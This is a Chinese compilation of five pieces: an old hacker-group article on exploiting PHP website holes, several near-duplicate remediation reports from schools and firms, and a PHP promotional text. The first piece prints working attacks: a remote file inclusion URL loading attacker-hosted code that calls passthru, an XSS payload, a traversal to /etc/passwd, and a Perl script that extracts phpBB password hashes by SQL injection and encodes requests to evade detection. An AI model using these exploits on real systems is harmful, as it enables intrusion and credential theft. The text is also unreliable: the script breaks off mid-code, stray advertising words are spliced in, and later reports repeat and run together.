第一篇：PHP網站漏洞的相關總結

PHP網站漏洞的相關總結

NB聯盟-zwell 從現在的網絡安全來看,大家最關注和接觸最多的WEB頁面漏洞應該是ASP了,在這方面,小竹是專家,我沒發言權.然而在PHP方面來看,也同樣存在很嚴重的安全問題,但是這方面的文章卻不多.在這里,就跟大家來稍微的討論一下PHP頁面的相關漏洞吧.我對目前常見的PHP漏洞做了一下總結,大致分為以下幾種:包含文件漏洞,腳本命令執行漏洞,文件泄露漏洞,SQL注入漏洞等幾種.當然,至于COOKIE欺騙等一部分通用的技術就不在這里討論了,這些資料網上也很多.那么,我們就一個一個來分析一下怎樣利用這些漏洞吧!首先,我們來討論包含文件漏洞.這個漏洞應該說是PHP獨有的吧.這是由于不充分處理外部提供的惡意數據,從而導致遠程攻擊者可以利用這些漏洞以WEB進程權限在系統上執行任意命令.我們來看一個例子:假設在a.php中有這樣一句代碼: 在這段代碼中,$include一般是一個已經設置好的路徑,但是我們可以通過自己構造一個路徑來達到攻擊的目的.比方說我們提交:a.php?include=http://web/b.php,這個web是我們用做攻擊的空間,當然,b.php也就是我們用來攻擊的代碼了.我們可以在b.php中寫入類似于:passthru(“/bin/ls /etc”);的代碼.這樣,就可以執行一些有目的的攻擊了.(注:web服務器應該不能執行php代碼,不然就出問題了.相關詳情可以去看<<如何對PHP程序中的常見漏洞進行攻擊>>).在這個漏洞方面,出狀況的很多,比方說:PayPal Store Front, HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.接著,我們再來看一下腳本命令執行漏洞.這是由于對用戶提交的URI參數缺少充分過濾，提交包含惡意HTML代碼的數據，可導致觸發跨站腳本攻擊，可能獲得目標用戶的敏感信息。我們也舉個例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁面對PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達到攻擊的目的: http://web/index.php?PHPSESSID=“>在script里面我們可以構造函數來獲得用戶的一些敏感信息.在這個漏洞方面相對要少一點,除了PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.再然后,我們就來看看文件泄露漏洞了.這種漏洞是由于對用戶提交參數缺少充分過濾，遠程攻擊者可以利用它進行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發現的phpMyAdmin來做例子.在phpMyAdmin中,export.php頁面沒有對偉創電腦維修用戶提交的'what'參數進行充分過濾,遠程攻擊者提交包含多個'../'字符的數據，便可繞過WEB ROOT限制，以WEB權限查看系統上的任意文件信息。比方說打入這樣一個地址:export.php?what=../../../../../../etc/passwd%00 就可以達到文件泄露的目的了.在這方面相對多一點,有:myPHPNuke,McNews等等.最后,我們又要回到最興奮的地方了.想想我們平時在asp頁面中用SQL注入有多么爽,以前還要手動注入,一直到小竹悟出”SQL注入密笈“(嘿嘿),然后再開做出NBSI以后,我們NB聯盟真是拉出一片天空.曾先后幫CSDN,大富翁論壇,中國頻道等大型網站找出漏洞.(這些廢話不多說了,有點跑題了...).還是言規正傳,其實在asp中SQL的注入和php中的SQL注入大致相同,只不過稍微注意一下用的幾個函數就好了.將asc改成ASCII,len改成LENGTH,其他函數基本不變了.其實大家看到PHP的SQL注入,是不是都會想到PHP-NUKE和PHPBB呢?不錯,俗話說樹大招分,像動網這樣的論壇在asp界就該是漏洞這王了,這并不是說它的論壇安全太差,而是名氣太響,別人用的多了,研究的人也就多了,發現的安全漏洞也就越多了.PHPBB也是一樣的,現在很大一部分人用PHP做論壇的話,一般都是選擇了PHPBB.它的漏桂林偉創電腦洞也是一直在出,從最早phpBB.com phpBB 1.4.0版本被人發現漏洞,到現在最近的phpBB 2.0.6版本的groupcp.php,以及之前發現的search.php,profile.php,viewtopic.php等等加起來,大概也有十來個樣子吧.這也一直導致,一部分人在研究php漏洞的時候都會拿它做實驗品,所謂百練成精嘛,相信以后的PHPBB會越來越好.好了,我們還是來分析一下漏洞產生的原因吧.拿viewtopic.php頁面來說,由于在調用viewtopic.php時，直接從GET請求中獲得”topic_id“并傳遞給SQL查詢命令,而并沒有進行一些過濾的處理,攻擊者可以提交特殊的SQL字符串用于獲得MD5密碼，獲得此密碼信息可以用于自動登錄或者進行暴力破解。(我想應該不會有人想去暴力破解吧,除非有特別重要的原因).先看一下相關源代碼: # if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))# { # $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);# } # else if(isset($HTTP_GET_VARS['topic']))# { # $topic_id = intval($HTTP_GET_VARS['topic']);# } 從上面我們可以看出,如果提交的view=newest并且sid設置了值的話,執行的查詢代碼像下面的這個樣子(如果你還沒看過PHPBB源代碼的話,建議你看了再對著這里來看,受影響系統為:phpBB 2.0.5和phpBB 2.0.4).# $sql = ”SELECT p.post_id # FROM “.POSTS_TABLE.” p, “.SESSIONS_TABLE.” s, “.USERS_TABLE.” u # WHERE s.session_id = '$session_id' # AND u.user_id = s.session_user_id # AND p.topic_id = $topic_id # AND p.post_time >= u.user_lastvisit # ORDER BY p.post_time ASC # LIMIT 1“;Rick提供了下面的這斷測試代碼: use IO::Socket;$remote = shift || 'localhost';$view_topic = shift || '/phpBB2/viewtopic.php';$uid = shift || 2;$port = 80;$dbtype = 'mysql4';# mysql4 or pgsql print ”Trying to get password hash for uid $uid server $remote dbtype: $dbtypen“;$p = ”“;for($index=1;$index<=32;$index++){ $socket = IO::Socket::INET->new(PeerAddr => $remote, PeerPort => $port, Proto => ”tcp“, Type => SOCK_STREAM)or die ”Couldnt connect to $remote:$port : $@n“;$str = ”GET $view_topic“.”?sid=1&topic_id=-1“.random_encode(make_dbsql()).”&view=newest“.” HTTP/1.0nn“;print $socket $str;print $socket ”Cookie: phpBB2mysql_sid=1n“;# replace this for pgsql or remove it print $socket ”Host: $remotenn“;while($answer = <$socket>){ if($answer =~ /location:.*x23(d+)/)# Matches the location: viewtopic.php?p=# { $p.= chr($1);} } close($socket);} print ”nMD5 Hash for uid $uid is $pn“;# random encode str.helps avoid detection sub random_encode { $str = shift;$ret = ”“;for($i=0;$i>).還有一點我覺得很多網站都會有這個問題,就是沒有關錯誤顯示.輕一看可能沒什么,但是一些盯了很久(用詞有點不對哦)的人就可以通過錯誤提示來獲得如數據庫信息,網頁文件物理路徑等等.以上都是我個人的一些觀點,如果你有什么看法,可以與我們聯系,大家在一起討論吧。

第二篇：網站漏洞整改報告

網站安全整改報告

收到教育局中心機房發來的網站安全漏洞檢測報告，對被檢測的域名地址進行確認，我校主要近階段處在新舊網站交替時期，舊網站還沒有退役，新網站也已上線。被檢測的存在漏洞的地址為我校原網站域名地址。我校安全領導小組馬上召開了緊急會議。經會議商討決定，作出以下幾點整改措失：

1.關閉舊網站；

2.加固原網站服務器及其他內部服務器，對服務器進進漏洞掃瞄，系統漏洞修補完畢；

3.對于新網站，此次雖然未進行檢測，但從兄弟學校的網站檢測報告來看（同開發單位），應該存在漏洞。會后馬上聯系開發單位進行檢測整改。

反思及下一步工作

（一）反思

1.網站開發時，只考慮了網站的功能使用，沒有考慮網站安全問題。

2.學校自己技術力量薄弱，對安全檢測有一定難度。

（二）下一步工作

1． 加強對服務器安全的管理，每月使用掃描工具對所有服務器進行日常掃描監控，并安裝好補丁。

2015/12/05

第三篇：網站漏洞整改報告

安全整改報告

整改情況

1.相關單位收到加固通知后，對IP地址進行確認，存在漏洞的地址均為集團客戶MAS機服務器地址。

2.相關單位維護人員到集團客戶現場對所有MAS設備進行了檢查并對相應的設備安裝了Apache Struts漏洞補丁，并將整改結果反饋至省公司。

3.經驗證，所有MAS設備已完成加固，漏洞修補完畢。

三、反思及下一步工作

（一）反思

1.業務系統上線前，并沒有做到有效地安全加固工作。2.集團客戶安全意識薄弱，MAS機加固工作存在一定難度。

（二）下一步工作

1． 加強對MAS服務器安全的管理，每月使用掃描工具對所有MAS進行日常掃描監控，同時對新增MAS服務器做好檢查并安裝好補丁。

2.對于新增MAS，做好完整的安全加固工作。后續每月對每一臺服務器做好檢查并安裝好補丁，把安全問題降到最低。

第四篇：網站漏洞整改報告

安全整改報告

整改情況 1.相關單位收到加固通知后，對ip地址進行確認，存在漏洞的地址均為集團客戶mas機服務器地址。2.相關單位維護人員到集團客戶現場對所有mas設備進行了檢查并對相應的設備安裝了apache struts漏洞補丁，并將整改結果反饋至省公司。3.經驗證，所有mas設備已完成加固，漏洞修補完畢。

三、反思及下一步工作

（一）反思

1.業務系統上線前，并沒有做到有效地安全加固工作。2.集團客戶安全意識薄弱，mas機加固工作存在一定難度。

（二）下一步工作 1． 加強對mas服務器安全的管理，每月使用掃描工具對所有mas進行日常掃描監控，同時對新增mas服務器做好檢查并安裝好補丁。2.對于新增mas，做好完整的安全加固工作。后續每月對每一臺服務器做好檢查并安裝好補丁，把安全問題降到最低。篇二：網站漏洞整改報告

網站漏洞整改報告

按照國家《中華人民共和國計算機信息系統安全保護條例》、《計算機信息網絡國際聯網安全保護管理辦法》、《互聯網安全保護技術措施規定》等有關法律法規規定，全面落實互聯網安全保護制度和安全保護技術措施，對網站、信息安全進行了嚴格漏洞安全檢查工作。

本次網站安全檢查是完全站在攻擊者角度，模擬黑客可能使用的攻擊技術和漏洞發現技術進行的安全性測試，通過結合多方面的攻擊技術進行測試，發現本校個別網站系統存在比較明顯的可利用的安全漏洞，針對已存在漏洞的系統需要進行重點加固。本次檢查結果和處理方案如下: 篇三：網站漏洞整改報告

網站安全整改報告

收到教育局中心機房發來的網站安全漏洞檢測報告，對被檢測的域名地址進行確認，我校主要近階段處在新舊網站交替時期，舊網站還沒有退役，新網站也已上線。被檢測的存在漏洞的地址為我校原網站域名地址。我校安全領導小組馬上召開了緊急會議。經會議商討決定，作出以下幾點整改措失： 1.關閉舊網站；

2.加固原網站服務器及其他內部服務器，對服務器進進漏洞掃瞄，系統漏洞修補完畢； 3.對于新網站，此次雖然未進行檢測，但從兄弟學校的網站檢測報告來看（同開發單位），應該存在漏洞。會后馬上聯系開發單位進行檢測整改。

反思及下一步工作

（一）反思

1.網站開發時，只考慮了網站的功能使用，沒有考慮網站安全問題。2.學校自己技術力量薄弱，對安全檢測有一定難度。

（二）下一步工作 1． 加強對服務器安全的管理，每月使用掃描工具對所有服務器進行日常掃描監控，并安裝好補丁。2015/12/05 1篇四：網站安全隱患整改報告 xxx網站安全隱患整改報告 xxx市公安局xxx分局：

自2015年6月11日接到xxx市公安局xxx分局下發的《政府網站安全隱患告知書》后，我公司技術部組織人力，針對檢查后發現的問題，迅速修補安全漏洞，并對所屬網站進行徹底檢查，進一步完善安全防范措施，提高網絡安全防范意識，有效增強了xxxxxx網站對有害信息的防范能力和防泄密水平。現將整改情況告知如下：

一、完成問題整改 針對通知附件的檢測結果，我公司網站在防sql注入等方面存在一些問題。針對以上問題，我公司技術部組織大量技術人員，檢測了整個網站的防注入隱患，制訂了新的地址過濾算法，完成了完成了網頁地址過濾等工作。

二、進一步提高網絡與信息安全工作水平

一是加強理論知識學習。建立學習制度，每半個月組織部門工作人員及專業技術人員，學習網絡安全知識及網絡信息保密的相關法律法規。通過學習，全面提高工作人員網絡安全知識水平，尤其是在網絡新病毒、網站新漏洞等網絡安全技術方面，做到及時溝通、信息共享。

二是加強網絡與信息安全管理。通過“責任落實到人，工作落實到紙”的方法，全面加強網絡與信息安全管理工作。我們設立了網站服務器安全員、機房管理員、網站檢測員、網站后臺技術員等，把責任具體到人，同時要求，各責任崗位要隨時做好工作記錄，各項工作最終落實到紙面。通過以上工作，我公司網站網絡信息安全管理水平得到整體提高。

三是建立健全信息網絡安全制度。在工作中，進一步細化工作程序，建立各項工作制度。完善了服務器數據定期備份制度、網絡信息發布簽審制度等。通過完善各類制度，使網絡安全信息工作有章可循，為做好xxxxxx網站信息網絡安全工作，奠定了堅實的基礎。

在今后的工作中，我們將進一步加強學習，嚴格管理，完善制度，努力提升xxxxxx網站信息網絡安全工作水平。2015年6月12日篇五：南寧四十二中網站整改報告

南寧市第四十二中學關于2014年

網站與信息安全檢查整改報告 南寧市網絡與信息安全信息通報中心： 3月6日貴單位對我校網站進行信息安全保障工作進行監督檢查后，發現我校網站存在信息安全漏洞。按照貴校要求，我校派遣專人到貴校領取了《南寧市第四十二中學網站檢測報告》，并對照相關要求，針對我校網站認真組織開展了自查整改。現將自查整改情況報告如下：

一、網站信息安全狀況總體評價

我校在檢查結果的基礎上，認真進行整改，信息安全工作取得了新的進展，一是在制度上更加健全；二是在人員落實上更加明確；三是在保密意識有所提高。

二、信息安全主要整改情況

（一）信息安全組織管理

成立了信息系統安全工作領導小組。明確了信息系統安全工作的責任領導和具體管護人員。按照信息安全工作要求上制定了信息安全工作計劃或工作方案。建立了信息安全責任制。按責任規定:信息安全工作領導小組對信息安全負首責，主管領導負總責，具體管理人負主責，并在單位組織開展信息安全教育培訓。

（二）日常信息安全管理

嚴格落實崗位責任制和保密責任制，托管網站的服務器

安裝必要的辦公軟件和應用軟件外，不安裝與工作無關的軟件；定期維護服務器。

（三）信息安全防護管理 1．網絡邊界防護管理。

關閉不必要的應用、服務、端口；定期更新賬戶口令；定期清理病毒木馬，使用安全站長聯盟平臺、百度云加速樂防護檢測、360網站安全技術工具定期進行漏洞掃描、病毒木馬檢測，并根據相應的提示進行修復，查殺木馬，添置天融信硬件防火墻，并進行有效配置設備安全策略；使用安全設備防病毒、防火墻、入侵檢測。2．門戶網站安全管理。

管理系統管理賬戶和口令，清理無關賬戶，防止出現空口令、弱口令和默認口令；關閉不必要的端口，停止不必要的服務和應用，刪除不必要的鏈接和插件；刪除臨時文件，防止敏感信息泄露；建立信息發布審核制度；使用技術工具定期進行漏洞掃描、木馬檢測。3.移動存儲設備安全管理。

托管網站的服務器不允許使用移動存儲設備。

（四）信息安全應急管理

制定信息安全應急預案并進行演練培訓。明確了應急技術支援隊伍。重要數據和重要信息系統備份。

三、整改后取得的成效

我校領導高度重視，把信息安全檢查工作列入了重要議事日程，并及時成立了信息安全工作領導小組，明確了檢查責任人，組織制定了檢查工作計劃和檢查方案，對檢查工作進行了安排部署，確保了檢查工作的順利進行。

整改之后我校信息系統得到了更好的維護，經過整改，目前經安全站長聯盟平臺、百度云加速樂防護檢測、360網站安全技術工具多款工具檢測，均未發現相關危險漏洞，木馬等。

嚴格按照相關監管部門的要求，積極完善各項安全制度、充分加強信息化安全工作人員教育培訓、全面落實安全防范措施、全力保障信息安全工作經費，信息安全風險得到有效降低，應急處置能力得到切實提高，保證了我校網站持續安全穩定運行。

第五篇：PHP建設網站的優勢

深圳五洲科創科技有限公司網址：//

PHP建設網站的優勢

PHP建設網站的優勢

一、跨平臺特性：

PHP語言可以運行于Linux、FreeBSD、OpenBSD、Solaris Unix、AIX、Darwin、Windows等多種操作系統，通常說的LAMP指的就是Linux、Apache、MySQL、PHP/Perl/Python。

PHP建設網站的優勢

二、數據庫支持：

PHP支持多種主流與非主流的數據庫，如：、Adabas D、DBA、dBase、dbm、filePro、Informix、InterBase、mSQL、MySQL、Microsoft SQL Server、Solid、Sybase、ODBC、oracle、oracle

8、PostgreSQL等。PHP建設網站的優勢

三、安全性：

加密支持，PHP4實現了完整的加密, 這些加密功能是一個完整的mycrypt庫，并且 PHP 4.0 支持哈希函數。Blowfish，TripleDES,MD5,并且SHA1 也是可使用的一些加密算法。使用PHP語言運行Linux、FreeBSD、OpenBSD、Solaris Unix操作系統，不需安裝任何殺毒軟件及補丁，安全可靠.PHP建設網站的優勢

四、擴展性：

擴充了API 模塊：PHP 4.0 為擴展的 API 模塊的提供了擴展PHP接口模塊,認為它比舊的 API 版本顯著地快。PHP 模塊已有的及最常用的接口多數被轉換到使用這個擴展的接口;另外，PHP屬于開源軟件，其源代碼完全公開，任何程序員為PHP擴展附加功能非常容易使PHP有很好的發展空間和擴展性.PHP建設網站的優勢

五、執行速度快：

PHP是一種強大的CGI腳本語言，語法混合了C、Java、Perl和PHP式的新語法，執行網頁比CGI、Perl和ASP更快，這是它的第一個突出的特點;內存方面，PHP 4.0 能更有效的使用內存, 導致較少的內存占用消耗,這主要歸功于引用計數技術的實現。

PHP建設網站的優勢

六、可移植性：

PHP 寫出來的 Web 后端 CGI 程序，可以很輕易的移植到不同的操作系統上。例如，先以 Linux 架的網站，在系統負荷過高時，可以快速地將整個系統移到 SUN 工作站上，不用重新編譯 CGI 程序。面對快速發展的 Internet，這是長期規劃的最好選擇。

PHP建設網站的優勢

七、功能全面性：

PHP包括圖形處理、編碼與解碼、壓縮文件處理、XML解析、支持HTTP的身份認證、Cookie、POP3、SNMP等。可以利用PHP連接包括Oracle，MS-Access，Mysql在內的大部分數據庫。從對象式的設計、結構化的特性、數據庫的處理、網絡接口應用、安全編碼機制等，PHP幾乎涵蓋了所有網站的一切功能。

可伸縮性。傳統上網頁的交互作用是通過CGI來實現的。CGI程序的伸縮性不很理想，因為它為每一個正在運行的CGI程序開一個獨立進程。解決方法就是將經常用來編寫CGI程序的語言的解釋器編譯進web服務器(比如mod_perl,JSP)，PHP就可以以這種方式安裝。內嵌的PHP可以具有更高的可伸縮性。

深圳五洲科創科技有限公司網址：//

9.要發揮php語言的優勢，Linux+Apache+MySQL+PHP.被稱為“黃金組合”。

10、國內排名前十名的網站中使用PHP的有8家：百度、騰訊網、新浪、搜狐、網易、淘寶、雅虎中國、Tom在線，易趣(ebay)。國內近兩年新推出的web2.0網站中，有80%使用PHP開發。Alexa中文網站500強中，394家以上的網站應用著PHP技術.PHP不會像因為被合作商限制、更多的免費及共享的特性大大降低使用的成本及擴展性。

參考：深圳五洲科創科技有限公司

網址：http://